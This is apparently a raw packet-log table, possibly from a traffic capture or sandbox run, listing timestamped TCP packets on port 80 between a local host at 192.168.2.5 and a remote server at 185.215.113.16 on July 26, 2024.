Jul 26, 2024 17:56:20.237827063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237837076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237847090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237878084 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.237878084 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.237936020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237946987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237956047 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237967014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237977028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237986088 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.237993002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.237993002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.237998009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.238008976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.238020897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.238030910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.238063097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295265913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295281887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295295000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295306921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295372963 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295423031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295433998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295445919 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295456886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295464039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295464039 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295469046 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295480967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295488119 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295492887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295546055 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295546055 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295725107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295748949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295763969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295767069 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295775890 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295794010 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295803070 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295805931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295818090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295829058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295840979 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295840979 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295840979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295852900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295866013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.295866966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295907021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.295921087 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.296159029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.296171904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.296211958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300559044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300575018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300586939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300597906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300610065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300621033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300628901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300628901 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300632954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300645113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300657034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300667048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300678968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300690889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300712109 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300712109 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300726891 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300735950 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300739050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300751925 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300762892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300774097 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300777912 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300786018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300796986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300807953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300807953 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300807953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300821066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300832987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300844908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300856113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300865889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300868034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300868034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300877094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300889015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300898075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300909996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300910950 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300910950 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300920963 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300932884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300942898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300955057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300956964 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300956964 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.300966024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.300988913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301001072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301001072 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301001072 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301052094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301052094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301579952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301593065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301604986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301660061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301660061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301836967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301851034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301862001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301873922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301884890 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301897049 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301923037 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301923037 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301929951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301943064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301954985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.301968098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.301968098 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.302002907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.302103996 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.302145958 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.303009987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.303056002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.352571964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.352596998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.352628946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.352639914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.352657080 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.352657080 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.352859974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353595018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353697062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353708982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353720903 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353739977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353750944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353755951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353755951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353765965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353785992 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353842974 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353848934 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353854895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353867054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353878975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353895903 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353955030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353966951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.353993893 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.353993893 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354078054 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354087114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354434967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354767084 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354851961 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354856968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354867935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354878902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354891062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354902983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354906082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354913950 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354923964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.354959965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.354959965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355243921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355253935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355264902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355276108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355283976 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355293036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355304956 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355315924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355341911 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355341911 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355406046 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355581045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355592012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355602026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355612993 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355621099 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355623960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355635881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355647087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.355664015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355664015 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.355693102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378401995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378417969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378453970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378484964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378496885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378509045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378520012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378525972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378525972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378534079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378561974 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378657103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378669024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378679991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378696918 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378696918 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378745079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378756046 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378767014 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378778934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378789902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378789902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378807068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378873110 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.378922939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378933907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.378961086 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379131079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379143000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379153967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379179001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379179001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379205942 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379251957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379261971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379272938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379288912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379312038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379312038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379374981 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379442930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379453897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379463911 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379473925 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379491091 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379612923 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379879951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.379920959 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.379990101 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380002975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380038023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380039930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380052090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380063057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380074024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380076885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380131006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380131006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380182028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380193949 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380215883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380474091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380475044 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380503893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380515099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380538940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380538940 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380620003 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380624056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380752087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380764008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380793095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380927086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380939960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380950928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380963087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.380970001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.380970001 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.381009102 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.381058931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.381071091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.381082058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.381098986 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.381133080 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382272959 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382308006 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382313967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382319927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382361889 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382361889 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382424116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382436037 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382447004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382457972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382473946 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382587910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382637978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382648945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382662058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382680893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382693052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382699966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382704973 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382740021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382740021 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382836103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382848978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382863045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382873058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382884026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382888079 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382895947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382908106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382927895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382927895 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382937908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382956028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382981062 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.382983923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.382996082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383038998 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.383089066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383100033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383111954 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383122921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383136988 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.383152008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.383152008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.383240938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.874744892 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.874861956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877007008 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877017975 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877028942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.877077103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.877800941 CEST	80	49705	185.215.113.16	192.168.2.5
